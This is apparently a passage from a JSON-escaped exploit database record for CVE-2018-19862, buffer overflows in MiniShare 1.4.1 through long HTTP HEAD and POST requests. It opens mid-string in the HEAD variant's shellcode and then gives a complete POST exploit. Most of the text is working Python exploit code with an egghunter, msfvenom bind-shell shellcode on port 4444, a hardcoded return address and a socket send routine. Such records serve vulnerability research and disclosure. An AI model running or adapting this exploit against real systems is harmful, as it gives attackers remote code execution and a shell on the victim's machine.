c\\x59\"\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\n\n# findjmp kernel32.dll esp - WinXP SP3 
English\n#0x7C809F83 call esp\n\nnops = \"\\x90\" * 16\n\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\n1786 - 4 - 16 - len(egghunter))\n\ntry:\nprint \"Sending exploit...\"\nconnection.connect((host,port))\nbuffer = (\n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\"\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\n\nconnection.send(buffer)\nconnection.close()\nprint \"\\nExploit Sended \", len(buffer)\nexcept:\nprint \"Connection error\"\n\n\n\n3. Solution:\n\nThis product is deprecated\n\n-->\n\n\n<!--\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.\n# Date: 05-12-2018\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://minishare.sourceforge.net/\n# Software Link: http://minishare.sourceforge.net/\n# Version: Minishare v1.4.1\n# Tested on: Windows\n# CVE : CVE-2018-19862\n# Category: exploit\n\n1. Description\n\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP POST request.\n\n\n2. 
Proof of Concept\n\nExploit:\n\n#!/usr/bin/env python\nimport socket\nimport struct\nimport os\n\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP POST request - by Rafa\n# CVE: CVE-2018-19862\n# Via Egghunter because shellcode in ESP only 210 bytes long.\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"127.0.0.1\"\nport = 80\n\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\negghunter =\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\n#Found 10 compatible encoders\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\n#x86/shikata_ga_nai chosen with final size 355\n#Payload size: 355 bytes\n#Final size of c file: 1516 bytes\n#unsigned char buf[] 
=\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\n\n# findjmp kernel32.dll esp - WinXP SP3 
English\n#0x7C809F83 call esp\n\nnops = \"\\x90\" * 16\n\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\n1786 - 4 - 16 - len(egghunter))\n\ntry:\nprint \"Sending exploit...\"\nconnection.connect((host,port))\n\nbuffer = (\n\"POST \" + junk + \" HTTP/1.1\\r\\n\"\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\n\nconnection.send(buffer)\nconnection.close()\nprint \"\\nExploit Sended \", len(buffer)\nexcept:\nprint \"Connection error\"\n\n\n\n3. Solution:\n\nThis product is deprecated\n\n-->", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}